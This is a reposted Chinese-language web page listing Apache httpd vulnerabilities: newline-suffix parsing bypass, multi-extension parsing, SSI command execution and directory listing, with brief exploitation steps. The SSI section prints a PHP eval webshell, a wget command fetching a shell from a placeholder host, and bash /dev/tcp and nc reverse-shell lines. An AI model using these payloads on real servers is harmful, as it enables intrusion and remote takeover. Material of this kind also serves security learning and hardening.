apache漏洞匯總


 

ID

技術描述

利用場景/條件

過程

參考

武器庫關聯

S1 Apache換行解析漏洞

Apache 2.4.0~2.4.29

Apache HTTPD是一款HTTP服務器,它可以通過mod_php來運行PHP網頁。其2.4.0~2.4.29版本中存在一個解析漏洞,在解析PHP時,1.php\x0a將被按照PHP后綴進行解析,導致繞過一些服務器的安全策略。

利用方法:

burp抓包,在Hex選項卡.php后面0d的位置右鍵-Insert byte,添加一個0a,然后發包,成功上傳

 

 

瀏覽器訪問 /x.php%0A,正常解析

 

 

https://www.cnblogs.com/leixiao-/p/10223090.html  
S2 Apache多后綴解析漏洞 使用module模式與php結合的所有版本 apache存在未知擴展名解析漏洞,使用fastcig模式與php結合的所有版本apache不存在此漏洞。

php本身可以解析: .php3 .php5 .pht .phtml 等等。。。。
apache解析文件從后往前解析 例如:1.php.xxx.aaa 從aaa向前解析,遇到認識的后綴如php則交給php處理。
apache : mime.typs 文件寫了apache認識的后綴
漏洞產生條件:
1、apache使用module模式 :在httpd.conf中設置

 

 

2、運維人員在配置服務器時,為了使Apache能夠解析PHP,而自己添加了一個handler :AddHandler application/x-httpd-php .php
window下路徑:Apache\conf\extra\httpd-php.conf

 

 

上傳1.php.aaaa 訪問1.php.aaaa 解析成功:

 

 

https://blog.csdn.net/weixin_45427650/article/details/105202486  
S3 Apache SSI遠程命令執行漏洞

影響版本:Apache全版本(支持SSI與CGI)

 

漏洞原理
SSI(server-side includes):是放置在HTML頁面中的指令,它可以將動態生成的內容添加到現有的HTML頁面,而不必通過CGI程序或其他動態技術來提供整個頁面。以上是定義采用在Apache官網對SSI的定義,說白了就是可以在HTML中加入特定的指令,也可以引入其他的頁面。開啟SSI需要單獨配置Apache,可以參考SSI配置。
SSI可以完成查看時間、文件修改時間、CGI程序執行結果、執行系統命令、連接數據庫等操作,功能非常強大。
我們要利用的就是SSI執行系統命令的功能,正常的一個包含SSI指令的文件,可以如下內容:

<pre>
<!--#exec cmd="whoami" -->
</pre>
文件名保存為test.shtml,這個后綴取決於Apache的配置,默認是此后綴。
當后台對擴展名校驗不嚴格時,可以上傳此類型文件,達到執行命令,獲取webshell的目的。執行效果:

 

 


上傳webshell:

<!--#exec cmd="wget http://xxx/shell.txt | rename shell.txt shell.php" -->
echo '<?php @eval($_POST[margin]);?>' > shell.php
反彈shell:

<!--#exec cmd="/bin/bash -i > /dev/tcp/192.168.0.118/8888 0<&1 2>&1" -->
<!--#exec cmd="nc x.x.x.x 8888 -e /bin/bash"-->

https://zhuanlan.zhihu.com/p/125115734  
S4 apache目錄遍歷

在httpd.conf文件:

Options + Indexes + FollowSymLinks + ExecCGI

漏洞特征:intitle:index of

在httpd.conf文件中找到 Options +Indexes +FollowSymLinks +ExecCGI 並修改成 Options -Indexes+FollowSymLinks +ExecCGI 並保存

https://blog.csdn.net/weixin_45427650/article/details/105202486  


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM